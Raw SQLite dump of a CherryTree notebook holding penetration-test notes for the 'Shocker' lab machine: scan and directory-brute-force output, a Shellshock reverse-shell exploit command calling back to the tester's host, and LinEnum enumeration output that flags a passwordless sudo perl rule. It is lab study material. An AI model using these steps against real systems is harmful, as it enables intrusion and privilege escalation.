SQLite format 3@ `-  Y/Cindexsqlite_autoindex_children_1children tableimageimageCREATE TABLE image ( node_id INTEGER, offset INTEGER, justification TEXT, anchor TEXT, png BLOB, filename TEXT, link TEXT, time INTEGER ) wtablegridgridCREATE TABLE grid ( node_id INTEGER, offset INTEGER, justification TEXT, txt TEXT, col_min INTEGER, col_max INTEGER )btablecodeboxcodeboxCREATE TABLE codebox ( node_id INTEGER, offset INTEGER, justification TEXT, txt TEXT, syntax TEXT, width INTEGER, height INTEGER, is_width_pix INTEGER, do_highl_bra INTEGER, do_show_linenum INTEGER )mtablenodenodeCREATE TABLE node ( node_id INTEGER UNIQUE, name TEXT, txt TEXT, syntax TEXT, tags TEXT, is_ro INTEGER, is_richtxt INTEGER, has_codebox INTEGER, has_table INTEGER, has_image INTEGER, level INTEGER, ts_creation INTEGER, ts_lastsave INTEGER )';indexsqlite_autoindex_node_1node `m'  Niktocustom-colors$A?&oA?&l%'  Web Servicescustom-colors"Aq Ĝk'  UDPcustom-colors$A?&ЍA[?Lk'  TCPcustom-colors$A?&A[>CX #='  Enumeration$ nmap -sC -sV -Pn -p- -oA ./Shocker 10.10.10.56 Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-16 15:22 EDT Nmap scan report for 10.10.10.56 Host is up (0.025s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Site doesn't have a title (text/html). 2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA) | 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA) |_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 28.38 secondscustom-colors*A.ojt link="webs http://10.10.10.56/cgi-bin">http://10.10.10.56/cgi-bin [+] Threads: 10 [+] Wordlist: /usr/share/dirb/wordlists/big.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Extensions: py,cgi,sh,pl [+] Timeout: 10s =============================================================== 2020/07/16 16:22:06 Starting gobuster =============================================================== /.htpasswd (Status: 403) /.htpasswd.py (Status: 403) /.htpasswd.cgi (Status: 403) /.htpasswd.sh (Status: 403) /.htpasswd.pl (Status: 403) /.htaccess (Status: 403) /.htaccess.cgi (Status: 403) /.htaccess.sh (Status: 403) /.htaccess.pl (Status: 403) /.htaccess.py (Status: 403) /user.sh (Status: 200) <<<----------- cgi bash script =============================================================== 2020/07/16 16:26:28 Finished =============================================================== custom-colors$A?&xA.sbN ==m'  Niktocustom-colors$A?&oA?&l%'  Web Servicescustom-colors"Aq Ĝk'  UDPcustom-colors$A?&ЍA[?Lk'  TCPcustom-colors$A?&A[>CX #='  Enumeration$ nmap -sC -sV -Pn -p- -oA ./Shocker 10.10.10.56 Starting Nmap 7.80 ( custom-colorsA* H$Hj '  SMBcustom-colorsA[PA[DNn )'  Other Servicescustom-colorsXA[Adk '  "CMScustom-colors$A[Y)A[Y}xn'  !WebDavcustom-colors$A[W;A[X2t)}'  Dirb\DirBustergobuster dir -w /usr/share/dirb/wordlists/big.txt -u http://10.10.10.56/cgi-bin -x cgi,sh,pl,py =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: custom-colors*AIZnn%]'  ExploitationService Exploited: Al'   Othercustom-colorsA[EϯA[Tci '  DBcustom-colorsA[EA[Selk '  SNMPcustom-colorsA[DԢA[G!Bpache CGI Scripts Vulnerability Type: Shell shock - Remote Command Injection Exploit POC: https://www.exploit-db.com/exploits/34900 Description: Discovery of Vulnerability gobuster found user.sh at /cgi-bin/ Exploit Code Used See Exploit DB site. ./shellshock.py payload=reverse rhost=10.10.10.56 lhost=10.10.14.10 lport=9999 pages=/cgi-bin/user.sh Proof\Local.txt File ☐ Screenshot with ifconfig\ipconfig ☐ Submit too OSCP Exam Panel custom-colors,A.r ### SYSTEM ############################################## [-] Kernel information: Linux Shocker 4.4.0-96-generic #119-Ubuntu SMP Tue Sep 12 14:59:54 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux [-] Kernel information (continued): Linux version 4.4.0-96-generic (buildd@lgw01-10) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.4) ) #119-Ubuntu SMP Tue Sep 12 14:59:54 UTC 2017 [-] Specific release information: DISTRIB_ID=Ubuntu DISTRIB_RELEASE=16.04 DISTRIB_CODENAME=xenial DISTRIB_DESCRIPTION="Ubuntu 16.04.3 LTS" NAME="Ubuntu" VERSION="16.04.3 LTS (Xenial Xerus)" ID=ubuntu ID_LIKE=debian PRETTY_NAME="Ubuntu 16.04.3 LTS" VERSION_ID="16.04" HOME_URL="http://www.ubuntu.com/" SUPPORT_URL="http://help.ubuntu.com/" BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/" VERSION_CODENAME=xenial UBUNTU_CODENAME=xenial [-] Hostname: Shocker ### USER/GROUP ########################################## [-] Current user/group info: uid=1000(shelly) gid=1000(shelly) groups=1000(shelly),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare) [-] Users that have previously logged onto the system: Username Port From Latest root tty1 Sun Dec 24 14:43:28 -0500 2017 shelly tty1 Fri Sep 22 15:52:14 -0400 2017 [-] Who else is logged on: 16:53:02 up 1:31, 0 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT [-] Group memberships: uid=0(root) gid=0(root) groups=0(root) uid=1(daemon) gid=1(daemon) groups=1(daemon) uid=2(bin) gid=2(bin) groups=2(bin) uid=3(sys) gid=3(sys) groups=3(sys) uid=4(sync) gid=65534(nogroup) groups=65534(nogroup) uid=5(games) gid=60(games) groups=60(games) uid=6(man) gid=12(man) groups=12(man) uid=7(lp) gid=7(lp) groups=7(lp) uid=8(mail) gid=8(mail) groups=8(mail) uid=9(news) gid=9(news) groups=9(news) uid=10(uucp) gid=10(uucp) groups=10(uucp) uid=13(proxy) gid=13(proxy) groups=13(proxy) uid=33(www-data) gid=33(www-data) groups=33(www-data) uid=34(backup) gid=34(backup) groups=34(backup) uid=38(list) gid=38(list) groups=38(list) uid=39(irc) gid=39(irc) groups=39(irc) uid=41(gnats) gid=41(gnats) groups=41(gnats) uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup) uid=100(systemd-timesync) gid=102(systemd-timesync) groups=102(systemd-timesync) uid=101(systemd-network) gid=103(systemd-network) groups=103(systemd-network) uid=102(systemd-resolve) gid=104(systemd-resolve) groups=104(systemd-resolve) uid=103(systemd-bus-proxy) gid=105(systemd-bus-proxy) groups=105(systemd-bus-proxy) uid=104(syslog) gid=108(syslog) groups=108(syslog),4(adm) uid=105(_apt) gid=65534(nogroup) groups=65534(nogroup) uid=106(lxd) gid=65534(nogroup) groups=65534(nogroup) uid=107(messagebus) gid=111(messagebus) groups=111(messagebus) uid=108(uuidd) gid=112(uuidd) groups=112(uuidd) uid=109(dnsmasq) gid=65534(nogroup) groups=65534(nogroup) uid=110(sshd) gid=65534(nogroup) groups=65534(nogroup) uid=1000(shelly) gid=1000(shelly) groups=1000(shelly),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare) [-] It looks like we have some admin users: uid=104(syslog) gid=108(syslog) groups=108(syslog),4(adm) uid=1000(shelly) gid=1000(shelly) groups=1000(shelly),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare) [-] Contents of /etc/passwd: root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false syslog:x:104:108::/home/syslog:/bin/false _apt:x:105:65534::/nonexistent:/bin/false lxd:x:106:65534::/var/lib/lxd/:/bin/false messagebus:x:107:111::/var/run/dbus:/bin/false uuidd:x:108:112::/run/uuidd:/bin/false dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin shelly:x:1000:1000:shelly,,,:/home/shelly:/bin/bash [-] Super user account(s): root [+] We can sudo without supplying a password! Matching Defaults entries for shelly on Shocker: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User shelly may run the following commands on Shocker: (root) NOPASSWD: /usr/bin/perl [+] Possible sudo pwnage! /usr/bin/perl [-] Accounts that have recently used sudo: /home/shelly/.sudo_as_admin_successful [-] Are permissions on /home directories lax: total 12K drwxr-xr-x 3 root root 4.0K Sep 22 2017 . drwxr-xr-x 23 root root 4.0K Sep 22 2017 .. drwxr-xr-x 4 shelly shelly 4.0K Sep 22 2017 shelly [-] Root is allowed to login via SSH: PermitRootLogin yes ### ENVIRONMENTAL ####################################### [-] Environment information: HTTP_HOST=10.10.10.56 PWD=/tmp SHLVL=3 HTTP_ACCEPT_ENCODING=identity _=/usr/bin/env [-] Path information: /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin drwxr-xr-x 2 root root 12288 Sep 22 2017 /bin drwxr-xr-x 2 root root 12288 Sep 22 2017 /sbin drwxr-xr-x 2 root root 20480 Sep 22 2017 /usr/bin drwxr-xr-x 2 root root 4096 Jul 19 2016 /usr/local/bin drwxr-xr-x 2 root root 4096 Jul 19 2016 /usr/local/sbin drwxr-xr-x 2 root root 4096 Sep 22 2017 /usr/sbin [-] Available shells: # /etc/shells: valid login shells /bin/sh /bin/dash /bin/bash /bin/rbash /usr/bin/tmux /usr/bin/screen [-] Current umask value: 0022 u=rwx,g=rx,o=rx [-]umask value as specified in /etc/login.defs: UMASK 022 [-] Password and storage information: PASS_MAX_DAYS 99999 PASS_MIN_DAYS 0 PASS_WARN_AGE 7 ENCRYPT_METHOD SHA512 ### JOBS/TASKS ########################################## [-] Cron jobs: -rw-r--r-- 1 root root 722 Apr 5 2016 /etc/crontab /etc/cron.d: total 20 drwxr-xr-x 2 root root 4096 Sep 22 2017 . drwxr-xr-x 90 root root 4096 Sep 22 2017 .. -rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder -rw-r--r-- 1 root root 589 Jul 16 2014 mdadm -rw-r--r-- 1 root root 191 Sep 22 2017 popularity-contest /etc/cron.daily: total 60 drwxr-xr-x 2 root root 4096 Sep 22 2017 . drwxr-xr-x 90 root root 4096 Sep 22 2017 .. -rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder -rwxr-xr-x 1 root root 539 Apr 5 2016 apache2 -rwxr-xr-x 1 root root 376 Mar 31 2016 apport -rwxr-xr-x 1 root root 1474 Jun 19 2017 apt-compat -rwxr-xr-x 1 root root 355 May 22 2012 bsdmainutils -rwxr-xr-x 1 root root 1597 Nov 26 2015 dpkg -rwxr-xr-x 1 root root 372 May 6 2015 logrotate -rwxr-xr-x 1 root root 1293 Nov 6 2015 man-db -rwxr-xr-x 1 root root 539 Jul 16 2014 mdadm -rwxr-xr-x 1 root root 435 Nov 18 2014 mlocate -rwxr-xr-x 1 root root 249 Nov 12 2015 passwd -rwxr-xr-x 1 root root 3449 Feb 26 2016 popularity-contest -rwxr-xr-x 1 root root 214 May 24 2016 update-notifier-common /etc/cron.hourly: total 12 drwxr-xr-x 2 root root 4096 Sep 22 2017 . drwxr-xr-x 90 root root 4096 Sep 22 2017 .. -rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder /etc/cron.monthly: total 12 drwxr-xr-x 2 root root 4096 Sep 22 2017 . drwxr-xr-x 90 root root 4096 Sep 22 2017 .. -rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder /etc/cron.weekly: total 24 drwxr-xr-x 2 root root 4096 Sep 22 2017 . drwxr-xr-x 90 root root 4096 Sep 22 2017 .. -rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder -rwxr-xr-x 1 root root 86 Apr 13 2016 fstrim -rwxr-xr-x 1 root root 771 Nov 6 2015 man-db -rwxr-xr-x 1 root root 211 May 24 2016 update-notifier-common [-] Crontab contents: # /etc/crontab: system-wide crontab # Unlike any other crontab you don't have to run the `crontab' # command to install the new version when you edit this file # and files in /etc/cron.d. These files also have username fields, # that none of the other crontabs do. SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin # m h dom mon dow user command 17 * * * * root cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) # [-] Systemd timers: NEXT LEFT LAST PASSED UNIT ACTIVATES Thu 2020-07-16 17:38:55 EDT 45min left Thu 2020-07-16 15:22:03 EDT 1h 30min ago snapd.refresh.timer snapd.refresh.service Thu 2020-07-16 18:16:29 EDT 1h 23min left Thu 2020-07-16 16:45:14 EDT 7min ago snap-repair.timer snap-repair.service Thu 2020-07-16 20:24:12 EDT 3h 31min left Thu 2020-07-16 15:22:04 EDT 1h 30min ago apt-daily.timer apt-daily.service Fri 2020-07-17 06:00:34 EDT 13h left Thu 2020-07-16 15:22:04 EDT 1h 30min ago apt-daily-upgrade.timer apt-daily-upgrade.service Fri 2020-07-17 15:37:10 EDT 22h left Thu 2020-07-16 15:37:10 EDT 1h 15min ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service 5 timers listed. Enable thorough tests to see inactive timers ### NETWORKING ########################################## [-] Network and IP info: ens33 Link encap:Ethernet HWaddr 00:50:56:b9:b1:45 inet addr:10.10.10.56 Bcast:10.10.10.255 Mask:255.255.255.0 inet6 addr: fe80::250:56ff:feb9:b145/64 Scope:Link inet6 addr: dead:beef::250:56ff:feb9:b145/64 Scope:Global UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:338137 errors:0 dropped:10 overruns:0 frame:0 TX packets:323516 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:47779861 (47.7 MB) TX bytes:131440813 (131.4 MB) lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:65536 Metric:1 RX packets:29280 errors:0 dropped:0 overruns:0 frame:0 TX packets:29280 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1 RX bytes:2169424 (2.1 MB) TX bytes:2169424 (2.1 MB) [-] ARP history: ? (10.10.10.2) at 00:50:56:b9:f9:ab [ether] on ens33 [-] Default route: default 10.10.10.2 0.0.0.0 UG 0 0 0 ens33 [-] Listening TCP: Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 0.0.0.0:2222 0.0.0.0 :* LISTEN - tcp6 0 0 :::2222 :::* LISTEN - tcp6 0 0 :::80 :::* LISTEN - [-] Listening UDP: Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name ### SERVICES ############################################# [-] Running processes: USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 1 0.0 1.2 38020 6024 ? Ss 15:21 0:04 /sbin/init root 2 0.0 0.0 0 0 ? S 15:21 0:00 [kthreadd] root 3 0.0 0.0 0 0 ? S 15:21 0:00 [ksoftirqd/0] root 5 0.0 0.0 0 0 ? S< 15:21 0:00 [kworker/0:0H] root 7 0.0 0.0 0 0 ? S 15:21 0:00 [rcu_sched] root 8 0.0 0.0 0 0 ? S 15:21 0:00! [rcu_bh] root 9 0.0 0.0 0 0 ? S 15:21 0:00 [migration/0] root 10 0.0 0.0 0 0 ? S 15:21 0:00 [watchdog/0] root 11 0.0 0.0 0 0 ? S 15:21 0:00 [kdevtmpfs] root 12 0.0 0.0 0 0 ? S< 15:21 0:00 [netns] root 13 0.0 0.0 0 0 ? S< 15:21 0:00 [perf] root 14 0.0 0.0 0 0 ? S 15:21 0:00 [khungtaskd] root 15 0.0 0.0 0 0 ? S< 15:21 0:00 [writeback] root 16 0.0 0.0 0 0 ? SN 15:21 0:00 [ksmd] root 17 0.0 0.0 0 0 ? S< 15:21 0:00 [crypto] root 18 0.0 0.0 0 0 ? S< 15:21 0:00 [kintegrityd] root 19 0.0 0.0 0 0 ? S<15:21 0:00 [bioset] root 20 0.0 0.0 0 0 ? S< 15:21 0:00 [kblockd] root 21 0.0 0.0 0 0 ? S< 15:21 0:00 [at"a_sff] root 22 0.0 0.0 0 0 ? S< 15:21 0:00 [md] root 23 0.0 0.0 0 0 ? S< 15:21 0:00 [devfreq_wq] root 27 0.0 0.0 0 0 ? S 15:21 0:00 [kswapd0] root 28 0.0 0.0 0 0 ? S< 15:21 0:00 [vmstat] root 29 0.0 0.0 0 0 ? S 15:21 0:00 [fsnotify_mark] root 30 0.0 0.0 0 0 ? S 15:21 0:00 [ecryptfs-kthrea] root 46 0.0 0.0 0 0 ? S< 15:21 0:00 [kthrotld] root 47 0.0 0.0 0 0 ? S< 15:21 0:00 [acpi_thermal_pm] root 48 0.0 0.0 0 0 ? S< 15:21 0:00 [bioset] root 49 0.0 0.0 0 0 ? S< 15:21 0:00 [bioset] root 50 0.0 0.0 0 0 ? S< 15:21 0:00 [bioset] root 51 0.0 0.0 0 0 ? S< 15:21 0:00 [bioset] root 52 0.0 0.0 0 0 ? S< 15#:21 0:00 [bioset] root 53 0.0 0.0 0 0 ? S< 15:21 0:00 [bioset] root 54 0.0 0.0 0 0 ? S< 15:21 0:00 [bioset] root 55 0.0 0.0 0 0 ? S< 15:21 0:00 [bioset] root 56 0.0 0.0 0 0 ? S 15:21 0:00 [scsi_eh_0] root 57 0.0 0.0 0 0 ? S< 15:21 0:00 [scsi_tmf_0] root 58 0.0 0.0 0 0 ? S 15:21 0:00 [scsi_eh_1] root 59 0.0 0.0 0 0 ? S< 15:21 0:00 [scsi_tmf_1] root 64 0.0 0.0 0 0 ? S< 15:21 0:00 [ipv6_addrconf] root 77 0.0 0.0 0 0 ? S< 15:21 0:00 [deferwq] root 78 0.0 0.0 0 0 ? S< 15:21 0:00 [charger_manager] root 127 0.0 0.0 0 0 ? S 15:21 0:00 [scsi_eh_2] root 128 0.0 0.0 0 0 ? S< 15:21 0:00 [scsi_tmf_2] root 129 0.0 0.0 0 $ 0 ? S< 15:21 0:00 [vmw_pvscsi_wq_2] root 130 0.0 0.0 0 0 ? S< 15:21 0:00 [bioset] root 147 0.0 0.0 0 0 ? S< 15:21 0:00 [kpsmoused] root 148 0.0 0.0 0 0 ? S< 15:21 0:00 [ttm_swap] root 181 0.0 0.0 0 0 ? S 15:21 0:00 [scsi_eh_3] root 182 0.0 0.0 0 0 ? S< 15:21 0:00 [scsi_tmf_3] root 183 0.0 0.0 0 0 ? S 15:21 0:00 [scsi_eh_4] root 184 0.0 0.0 0 0 ? S< 15:21 0:00 [scsi_tmf_4] root 185 0.0 0.0 0 0 ? S 15:21 0:00 [scsi_eh_5] root 186 0.0 0.0 0 0 ? S< 15:21 0:00 [scsi_tmf_5] root 187 0.0 0.0 0 0 ? S 15:21 0:00 [scsi_eh_6] root 188 0.0 0.0 0 0 ? S< 15:21 0:00 [scsi_tmf_6] root 189 0.0 0.0 0 0 ? S 15:21 0:00 [scsi_eh_7] root % 190 0.0 0.0 0 0 ? S< 15:21 0:00 [scsi_tmf_7] root 191 0.0 0.0 0 0 ? S 15:21 0:00 [scsi_eh_8] root 192 0.0 0.0 0 0 ? S< 15:21 0:00 [scsi_tmf_8] root 193 0.0 0.0 0 0 ? S 15:21 0:00 [scsi_eh_9] root 194 0.0 0.0 0 0 ? S< 15:21 0:00 [scsi_tmf_9] root 195 0.0 0.0 0 0 ? S 15:21 0:00 [scsi_eh_10] root 196 0.0 0.0 0 0 ? S< 15:21 0:00 [scsi_tmf_10] root 197 0.0 0.0 0 0 ? S 15:21 0:00 [scsi_eh_11] root 198 0.0 0.0 0 0 ? S< 15:21 0:00 [scsi_tmf_11] root 199 0.0 0.0 0 0 ? S 15:21 0:00 [scsi_eh_12] root 200 0.0 0.0 0 0 ? S< 15:21 0:00 [scsi_tmf_12] root 201 0.0 0.0 0 0 ? S 15:21 0:00 [scsi_eh_13] root 202 0.0 0.0 0 0 ? S< 15:21 &0:00 [scsi_tmf_13] root 203 0.0 0.0 0 0 ? S 15:21 0:00 [scsi_eh_14] root 204 0.0 0.0 0 0 ? S< 15:21 0:00 [scsi_tmf_14] root 205 0.0 0.0 0 0 ? S 15:21 0:00 [scsi_eh_15] root 206 0.0 0.0 0 0 ? S< 15:21 0:00 [scsi_tmf_15] root 207 0.0 0.0 0 0 ? S 15:21 0:00 [scsi_eh_16] root 208 0.0 0.0 0 0 ? S< 15:21 0:00 [scsi_tmf_16] root 209 0.0 0.0 0 0 ? S 15:21 0:00 [scsi_eh_17] root 210 0.0 0.0 0 0 ? S< 15:21 0:00 [scsi_tmf_17] root 211 0.0 0.0 0 0 ? S 15:21 0:00 [scsi_eh_18] root 212 0.0 0.0 0 0 ? S< 15:21 0:00 [scsi_tmf_18] root 213 0.0 0.0 0 0 ? S 15:21 0:00 [scsi_eh_19] root 214 0.0 0.0 0 0 ? S< 15:21 0:00 [scsi_tmf_19] root 215 0.0 0.0 ' 0 0 ? S 15:21 0:00 [scsi_eh_20] root 216 0.0 0.0 0 0 ? S< 15:21 0:00 [scsi_tmf_20] root 217 0.0 0.0 0 0 ? S 15:21 0:00 [scsi_eh_21] root 218 0.0 0.0 0 0 ? S< 15:21 0:00 [scsi_tmf_21] root 219 0.0 0.0 0 0 ? S 15:21 0:00 [scsi_eh_22] root 220 0.0 0.0 0 0 ? S< 15:21 0:00 [scsi_tmf_22] root 221 0.0 0.0 0 0 ? S 15:21 0:00 [scsi_eh_23] root 222 0.0 0.0 0 0 ? S< 15:21 0:00 [scsi_tmf_23] root 223 0.0 0.0 0 0 ? S 15:21 0:00 [scsi_eh_24] root 224 0.0 0.0 0 0 ? S< 15:21 0:00 [scsi_tmf_24] root 225 0.0 0.0 0 0 ? S 15:21 0:00 [scsi_eh_25] root 226 0.0 0.0 0 0 ? S< 15:21 0:00 [scsi_tmf_25] root 227 0.0 0.0 0 0 ? S 15:21 0:00 [scsi_eh_26(] root 228 0.0 0.0 0 0 ? S< 15:21 0:00 [scsi_tmf_26] root 229 0.0 0.0 0 0 ? S 15:21 0:00 [scsi_eh_27] root 230 0.0 0.0 0 0 ? S< 15:21 0:00 [scsi_tmf_27] root 231 0.0 0.0 0 0 ? S 15:21 0:00 [scsi_eh_28] root 232 0.0 0.0 0 0 ? S< 15:21 0:00 [scsi_tmf_28] root 233 0.0 0.0 0 0 ? S 15:21 0:00 [scsi_eh_29] root 234 0.0 0.0 0 0 ? S< 15:21 0:00 [scsi_tmf_29] root 235 0.0 0.0 0 0 ? S 15:21 0:00 [scsi_eh_30] root 236 0.0 0.0 0 0 ? S< 15:21 0:00 [scsi_tmf_30] root 237 0.0 0.0 0 0 ? S 15:21 0:00 [scsi_eh_31] root 238 0.0 0.0 0 0 ? S< 15:21 0:00 [scsi_tmf_31] root 239 0.0 0.0 0 0 ? S 15:21 0:00 [scsi_eh_32] root 240 0.0 0.0 0 0 ? ) S< 15:21 0:00 [scsi_tmf_32] root 264 0.0 0.0 0 0 ? S 15:21 0:00 [kworker/u256:27] root 266 0.0 0.0 0 0 ? S 15:21 0:00 [kworker/u256:29] root 336 0.0 0.0 0 0 ? S< 15:21 0:00 [raid5wq] root 361 0.0 0.0 0 0 ? S< 15:21 0:00 [kdmflush] root 362 0.0 0.0 0 0 ? S< 15:21 0:00 [bioset] root 372 0.0 0.0 0 0 ? S< 15:21 0:00 [kdmflush] root 373 0.0 0.0 0 0 ? S< 15:21 0:00 [bioset] root 389 0.0 0.0 0 0 ? S< 15:21 0:00 [bioset] root 417 0.0 0.0 0 0 ? S 15:21 0:00 [jbd2/dm-0-8] root 418 0.0 0.0 0 0 ? S< 15:21 0:00 [ext4-rsv-conver] root 465 0.0 0.0 0 0 ? S< 15:21 0:00 [kworker/0:1H] root 479 0.0 0.0 0 0 ? S< 15:21 0:00 [iscsi_eh] root * 484 0.0 0.0 0 0 ? S< 15:21 0:00 [ib_addr] root 491 0.0 0.0 0 0 ? S< 15:21 0:00 [ib_mcast] root 492 0.0 0.0 0 0 ? S< 15:21 0:00 [ib_nl_sa_wq] root 493 0.0 0.0 0 0 ? S< 15:21 0:00 [ib_cm] root 494 0.0 0.0 0 0 ? S< 15:21 0:00 [iw_cm_wq] root 495 0.0 0.6 27688 3052 ? Ss 15:21 0:00 /lib/systemd/systemd-journald root 499 0.0 0.0 0 0 ? S< 15:21 0:00 [rdma_cm] root 500 0.0 0.0 0 0 ? S 15:21 0:00 [kauditd] root 507 0.0 0.0 0 0 ? S 15:21 0:02 [kworker/0:5] root 526 0.0 0.3 102968 1680 ? Ss 15:21 0:00 /sbin/lvmetad -f root 543 0.0 0.8 44744 3984 ? Ss 15:22 0:00 /lib/systemd/systemd-udevd root 780 0.0 0.0 0 0 ? S< 15:22 0:00 [ext4-rsv-conver] systemd+ 809 0.0 0.4 100324 2324+ ? Ssl 15:22 0:00 /lib/systemd/systemd-timesyncd root 927 0.0 1.9 185608 9532 ? Ssl 15:22 0:03 /usr/bin/vmtoolsd root 928 0.0 0.2 20100 1224 ? Ss 15:22 0:00 /lib/systemd/systemd-logind syslog 962 0.0 0.6 256396 3036 ? Ssl 15:22 0:00 /usr/sbin/rsyslogd -n root 966 0.0 0.5 29008 2844 ? Ss 15:22 0:00 /usr/sbin/cron -f root 969 0.0 4.3 267556 20912 ? Ssl 15:22 0:00 /usr/lib/snapd/snapd message+ 974 0.0 0.7 42936 3808 ? Ss 15:22 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation root 987 0.0 0.3 95368 1460 ? Ssl 15:22 0:00 /usr/bin/lxcfs /var/lib/lxcfs/ root 995 0.0 1.2 275856 6104 ? Ssl 15:22 0:00 /usr/lib/accountsservice/accounts-daemon root 998 0.0 0.2 4400 1316 ? Ss 15:22 0:00 /usr/sbin/acpid daemon 1002 0.0 0.4 26044 2012 ? Ss 15:22 0:00 /usr/sbin/atd -,f root 1033 0.0 0.0 13376 168 ? Ss 15:22 0:00 /sbin/mdadm --monitor --pid-file /run/mdadm/monitor.pid --daemonise --scan --syslog root 1037 0.0 1.1 277088 5744 ? Ssl 15:22 0:00 /usr/lib/policykit-1/polkitd --no-debug root 1118 0.0 1.2 65520 5924 ? Ss 15:22 0:00 /usr/sbin/sshd -D root 1128 0.0 0.0 5224 160 ? Ss 15:22 0:00 /sbin/iscsid root 1129 0.0 0.7 5724 3520 ? S<Ls 15:22 0:00 /sbin/iscsid root 1206 0.0 0.3 15940 1624 tty1 Ss+ 15:22 0:00 /sbin/agetty --noclear tty1 linux root 1252 0.0 0.9 73684 4408 ? Ss 15:22 0:00 /usr/sbin/apache2 -k start shelly 1255 0.0 0.6 73432 3236 ? S 15:22 0:00 /usr/sbin/apache2 -k start shelly 1256 0.3 0.8 560328 4144 ? Sl 15:22 0:19 /usr/sbin/apache2 -k start shelly 1257 0.3 0.9 560304 4488 ? Sl 15:22 0:20 /usr/sbin/apache2 -k start root 1467 0.0 0.0 0 0 ? - S 16:45 0:00 [kworker/0:1] shelly 1473 0.0 0.6 17948 3008 ? S 16:49 0:00 /bin/bash shelly 1474 0.0 0.5 17944 2804 ? S 16:49 0:00 /bin/bash shelly 1480 0.0 0.6 18536 3360 ? S 16:52 0:00 /bin/bash ./LinEnum.sh +t shelly 1481 0.0 0.6 18580 3128 ? S 16:52 0:00 /bin/bash ./LinEnum.sh +t shelly 1482 0.0 0.1 4384 756 ? S 16:52 0:00 tee -a shelly 1693 0.0 0.5 18564 2484 ? S 16:53 0:00 /bin/bash ./LinEnum.sh +t shelly 1694 0.0 0.6 34424 2940 ? R 16:53 0:00 ps aux [-] Process binaries and associated permissions (from above list): -rwxr-xr-x 1 root root 955024 